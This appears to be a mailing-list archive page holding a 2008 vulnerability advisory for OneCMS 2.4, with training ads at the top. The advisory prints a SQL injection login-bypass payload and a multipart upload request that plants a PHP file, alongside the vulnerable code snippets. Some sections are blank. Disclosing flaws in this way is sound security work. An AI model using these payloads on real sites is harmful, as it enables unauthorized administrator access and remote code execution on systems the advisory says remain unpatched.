Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | OneCMS Vulnerabilities |
|---|---|
| Date: | Mon, 07 Jan 2008 12:19:47 +0330 |
########################## WwW.BugReport.ir ########################## # # AmnPardaz Security Research Team # # Title: OneCMS Vulnerabilities # Vendor: http://www.insanevisions.com # Bugs: SQL Injection (Authentication bypass) , Arbitrary file upload! # Vulnerable Version: 2.4 (prior versions also may be affected) # Exploitation: Remote with browser # Fix Available: No! ######################################################################
#################### - Description: ####################
#################### - Vulnerability: ####################
+-->Multiple SQL Injection vulnerabilities (authentication bypass)
Code Snippet: a_login.php Line#5-12
if ($_GET['login'] == "yes") {$usernameb = strip_tags(stripcslashes($_POST['username'])); $passwordc = $_POST['password']; $passwordb = md5($passwordc);
POC : Username: admin' or 1=1 /* Password: something
------------------------------------ Code Snippet: staff.php Line#30-31
+--> Arbitrary file upload!
Code Snippet: a_upload.php Line#472-475
copy ($_FILES["ss_$i"]["tmp_name"], "$path/".$_FILES["ss_$i"]["name"]."");
<? phpinfo(); ?> -----------------------------7d84115025c Content-Disposition: form-data; name="ss2_1"
-----------------------------7d84115025c Content-Disposition: form-data; name="type_1"
image -----------------------------7d84115025c Content-Disposition: form-data; name="muche"
1 -----------------------------7d84115025c Content-Disposition: form-data; name="Submit"
Upload -----------------------------7d84115025c--
#################### - Credit : #################### Original Advisory: http://www.bugreport.ir/?/26 AmnPardaz Security Research Team Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | eTicket 1.5.5.2 Multiple Vulnerabilities, L4teral |
|---|---|
| Next by Date: | New Web Hacking Incidents at WHID, Ofer Shezaf |
| Previous by Thread: | eTicket 1.5.5.2 Multiple Vulnerabilities, L4teral |
| Next by Thread: | Re: OneCMS Vulnerabilities, webmaster |
| Indexes: | [Date] [Thread] [Top] [All Lists] |